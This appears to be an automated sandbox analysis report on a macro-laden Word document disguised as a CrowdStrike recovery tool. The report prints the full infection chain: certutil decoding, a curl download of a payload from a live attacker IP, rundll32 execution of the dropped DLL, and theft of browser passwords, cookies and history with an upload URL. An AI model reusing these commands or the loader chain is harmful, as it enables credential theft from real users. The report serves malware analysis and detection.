Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B137A cpuid
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,__vcrt_getptd,GetLcidFromDefault,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exeCode function: __crt_fast_encode_pointer,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoEx,FormatMessageA,
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B1775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CC8F40 _invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,GetTimeZoneInformation,
Source: C:\Windows\SysWOW64\certutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\rundll32.exeCode function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0089A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_00898490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C496B0 _mbsset_s,_mbsset_s,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3DF49 bind,WSAGetLastError,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C37F90 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C543E0 htons,_mbsset_s,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3E1E0 bind,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0086A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00868490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid Accounts1
Windows Management Instrumentation
32
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
2
OS Credential Dumping
2
System Time Discovery
1
Exploitation of Remote Services
12
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts1
Native API
1
Obfuscated Files or Information
1
Extra Window Memory Injection
1
Deobfuscate/Decode Files or Information
1
Credentials In Files
3
File and Directory Discovery
Remote Desktop Protocol1
Data from Local System
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
111
Process Injection
12
Obfuscated Files or Information
Security Account Manager36
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
Command and Scripting Interpreter
Login HookLogin Hook1
DLL Side-Loading
NTDS11
Security Software Discovery
Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets1
Virtualization/Sandbox Evasion
SSHKeylogging5
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain Credentials2
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading
DCSync1
System Network Configuration Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Rundll32
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1478411 Sample: New_Recovery_Tool_to_help_w... Startdate: 22/07/2024 Architecture: WINDOWS Score: 100 83 Multi AV Scanner detection for submitted file 2->83 85 Document contains VBA stomped code (only p-code) potentially bypassing AV detection 2->85 87 Machine Learning detection for dropped file 2->87 89 8 other signatures 2->89 10 WINWORD.EXE 162 473 2->10         started        13 WINWORD.EXE 2->13         started        16 chrome.exe 2->16         started        19 chrome.exe 2->19         started        process3 dnsIp4 91 Office process queries suspicious COM object (likely to drop second stage) 10->91 21 cmd.exe 1 10->21         started        63 C:\Users\user\AppData\Local\...\~WRC0000.tmp, Microsoft 13->63 dropped 23 cmd.exe 13->23         started        75 192.168.2.6, 443, 49703, 49714 unknown unknown 16->75 77 239.255.255.250 unknown Reserved 16->77 65 C:\...\MsftRecoveryToolForCSv2.zip (copy), Zip 16->65 dropped 25 chrome.exe 16->25         started        file5 signatures6 process7 dnsIp8 28 curl.exe 2 21->28         started        32 rundll32.exe 21->32         started        34 certutil.exe 2 21->34         started        42 4 other processes 21->42 36 rundll32.exe 23->36         started        38 conhost.exe 23->38         started        40 xcopy.exe 23->40         started        44 4 other processes 23->44 79 www.google.com 142.250.186.164 GOOGLEUS United States 25->79 process9 dnsIp10 81 172.104.160.126, 49717, 49724, 49725 LINODE-APLinodeLLCUS United States 28->81 67 C:\Users\user\AppData\Local\...\mscorsvc.txt, PEM 28->67 dropped 46 rundll32.exe 37 32->46         started        69 C:\Users\user\AppData\Local\Temp\curl.txt, PEM 34->69 dropped 49 rundll32.exe 36->49         started        71 C:\Users\user\AppData\Local\...\mscorsvc.dll, PE32+ 42->71 dropped 73 C:\Users\user\AppData\Local\Temp\curl.exe, PE32 42->73 dropped file11 process12 signatures13 93 Contains functionality to steal Chrome passwords or cookies 46->93 51 cmd.exe 1 46->51         started        95 System process connects to network (likely due to code injection or exploit) 49->95 97 Tries to harvest and steal browser information (history, passwords, etc) 49->97 53 cmd.exe 49->53         started        process14 process15 55 conhost.exe 51->55         started        57 taskkill.exe 51->57         started        59 conhost.exe 53->59         started        61 taskkill.exe 53->61         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm26%ReversingLabsScript-Macro.Downloader.Heuristic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\curl.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\mscorsvc.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
http://172.104.160.126:8099/payload2.txt6ov0%Avira URL Cloudsafe
https://curl.se/libcurl/c/curl_easy_setopt.html0%Avira URL Cloudsafe
https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
http://172.104.160.126:80X990%Avira URL Cloudsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
http://172.104.160.126:80990%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
http://172.104.160.0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt-oC:0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
http://172.104.160.126:5000/Upl0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txton0%Avira URL Cloudsafe
https://curl.se/docs/sslcerts.html0%Avira URL Cloudsafe
http://172.104.160.126:5000/Uploadss0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html#0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
https://curl.se/docs/sslcerts.htmlcurl0%Avira URL Cloudsafe
https://aka.ms/vs/17/release/vc_redist.x64.exe0%Avira URL Cloudsafe
https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
http://172.104.160.126:8099/pay0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html#0%Avira URL Cloudsafe
http://172.104.160.126:8099/pay00%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txtr0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html#0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt60%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txts0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt0%Avira URL Cloudsafe
https://curl.se/P0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txto0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.186.164
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://172.104.160.126:5000/Uploadsstrue
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txttrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://duckduckgo.com/chrome_newtabV2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txt6ovcurl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/libcurl/c/curl_easy_setopt.htmlcurl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://duckduckgo.com/ac/?q=V2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099vbaProject.bintrue
    • Avira URL Cloud: safe
    unknown
    https://www.google.com/images/branding/product/ico/googleg_lodp.icoV2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.htmlcurl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:80X99vbaProject.binfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drtrue
    • Avira URL Cloud: safe
    unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=V2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txt-oC:curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    http://172.104.160.126:5000/Uplrundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
